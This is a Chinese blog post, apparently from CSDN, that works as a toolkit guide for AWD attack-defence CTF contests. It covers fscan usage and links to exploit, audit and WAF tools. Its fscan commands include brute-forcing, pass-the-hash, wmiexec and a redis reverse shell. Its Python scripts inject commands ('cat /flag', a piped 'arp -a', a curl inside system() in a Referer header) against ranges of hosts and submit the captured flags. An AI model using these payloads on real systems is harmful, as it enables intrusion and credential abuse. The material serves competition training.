awd工具安装

fscan(漏洞扫描)

下载

下载地址: Releases · shadow1ng/fscan · GitHub

把下载的文件放到指定文件目录里,

在文件的位置打开cmd

输入 fscan64.exe -h 192.168.1.1/24

ok了

接下来说说fscan的使用

使用

1.信息搜集:

  • 存活探测(icmp)

  • 端口扫描

2.爆破功能:

  • 各类服务爆破(ssh、smb等)

  • 数据库密码爆破(mysql、mssql、redis、psql等)

3.系统信息、漏洞扫描:

  • 获取目标网卡信息

  • 高危漏洞扫描(ms17010等)

4.Web探测功能:

  • webtitle探测

  • web指纹识别(常见cms、oa框架等)

  • web漏洞扫描(weblogic、st2等,支持xray的poc)

5.漏洞利用:

  • redis写公钥或写计划任务

  • ssh命令执行

6.其他功能:

  • 文件保存

命令如下:

.\fscan64.exe -h 172.17.171.10 -p 1-65535
fscan.exe -h 192.168.1.1/24  (默认使用全部模块)
fscan.exe -h 192.168.1.1/16  (B段扫描)

fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径) 
fscan.exe -h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
fscan.exe -hf ip.txt  (以文件导入)
fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec无回显命令执行)

Aazhen-V3.1

下载:GitHub - zangcc/Aazhen-RexHa: 自研JavaFX图形化漏洞扫描工具,支持扫描的漏洞分别是: ThinkPHP-2.x-RCE, ThinkPHP-5.0.23-RCE, ThinkPHP5.0.x-5.0.23通杀RCE, ThinkPHP5-SQL注入&敏感信息泄露, ThinkPHP 3.x 日志泄露NO.1, ThinkPHP 3.x 日志泄露NO.2, ThinkPHP 5.x 数据库信息泄露的漏洞检测,以及批量检测的功能。漏洞POC基本适用ThinkPHP全版本漏洞。

ThinkPHPGUI

下载:GitHub - Lotus6/ThinkphpGUI: Thinkphp(GUI)漏洞利用工具,支持各版本TP漏洞检测,命令执行,getshell。

Diffmerge(比较不同)

下载: SourceGear | DiffMerge

Windows版本不支持自定义安装目录,默认是:C\ProgramFiles\SourceGear\Common\DiffMerge\

D盾(扫描文件漏洞)

下载: D盾防火墙

D盾免杀:D盾安装使用及D盾免杀_d盾官网-CSDN博客

Seay(代码审计)

下载: GitHub - f1tz/cnseay: Seay源代码审计系统

watchbird(waf)

下载:Releases · leohearts/awd-watchbird · GitHub

将waf.so,watchbird.php文件存放在/var/www/html或其他目录中

确保当前用户对目标目录可写

执行php watchbird.php --install [Web目录], 安装器将输出安装了watchbird的文件路径

访问任意启用了waf的文件, 参数?watchbird=ui打开watchbird控制台, 创建一个初始密码

如需卸载, 请在相同的位置输入php watchbird.php --uninstall [Web目录], 如果您多次运行了安装,请多次运行卸载直到卸载器无输出

网站备份文件泄露扫描

地址:GitHub - sry309/ihoneyBakFileScan: 多进程批量网站备份文件泄露扫描工具v0.2

批量攻击提交flag脚本

import requests
def regeister():
    url ='http://localhost:8801/index.php?c=User&a=register'
 
    data = {
        'username':'1234',
        'password':'1234',
        'sex':0,
        'age':18
    }
    res = requests.post(url=url,data=data)
 
    if res.status_code == 200:
        print('注册成功')
    else:
        print('注册失败')
def login():
    url1='http://localhost:8801/'
    grame = {
        'username':'1234',
        'password':'1234',
 
    }
    res = requests.post(url=url1,data=grame)
    if res.status_code==200:
        print('登录成功')
    else:
        print('登录失败')
def usevu():
    url2 = 'http://localhost:8801/index.php?c=User&a=ping'
    data={
        'host':';cat /flag'
    }
    res = requests.post(url=url2,data=data)
    if res.status_code==200:
        flag=res.text
        print(flag)
        return flag
    else:
        print('查找失败')
def submit(flags):
    url = 'http://localhost:19999/api/flag'
    headers={
        "Content-Type": "application/json",
        "Authorization": "e8b084904533203d71dbc24f6f2009c5"
    }
    flag=flags
    data = {
        "flag":flag
    }
    res = requests.post(url=url,json=data,headers=headers)
    if res.status_code==200:
        print('提交成功')
    else:
        print('提交失败')
if __name__=='__main__':
    regeister()
    login()
    flags=usevu()
    submit(flags=flags)
import requests
import re
​
path = '/WebApi/competitionCyberRange/static/base/#/competition/route/competiManage/competiAnswer'   # 攻击路径
​
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0',
'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
          "Accept-Language": 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'close',
'Cookie': 'JSESSIONID=823B9BC42B2A423CD515CEAEC3ECCDAA'
}
​
data = {
    'ip': '127.0.0.1|arp -a',
    'Submit': 'Submit'
}
​
#flag提交地址
url_flag = 'http://10.0.0.1/submit.php?token=123456&flag='
​
#批量攻击和提交
def attack():
    with open('urls.txt', 'r') as file:
        for line in file:
            url = line.strip()  + path      # 攻击url
            ret = requests.post(url=url, headers=headers, data=data, timeout=10)
            #print("Response:", ret.text)  # 调试输出
            flag_match = re.search(r'flag\{.+\}', ret.text)
            if flag_match:
                flag = flag_match.group()
                print("Flag:", flag)
                flag_url = url_flag + flag
                #res = requests.post(url=flag_url,headers=headers,timeout=2)   #注意这里的headers可能有问题,需要根据实际情况修改
                print(res.text)
            else:
                print(line.strip() +  " Flag not found")
attack()
import requests

for i in range(101, 200):
    url = f"http://172.19.{i}.42/api/v1.token/test"
    try:
        headers = {'Referer': 'system("curl http://10.10.1.50:9028/competition/flagManager/getFlag");'}
        req = requests.post(url, headers=headers)
        print(f"172.19.{i}.42", end="-")
        print(req.text)
    except Exception as e:
        print("next")

ehole(指纹识别)

下载: https://github.com/EdgeSecurityTeam/Ehole/releases

使用: .\EHole_windows_amd64.exe -u https://xxxxx

cms漏洞库:https://github.com/jayimu/vul_wiki

识别出来进行复现

  • 39
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值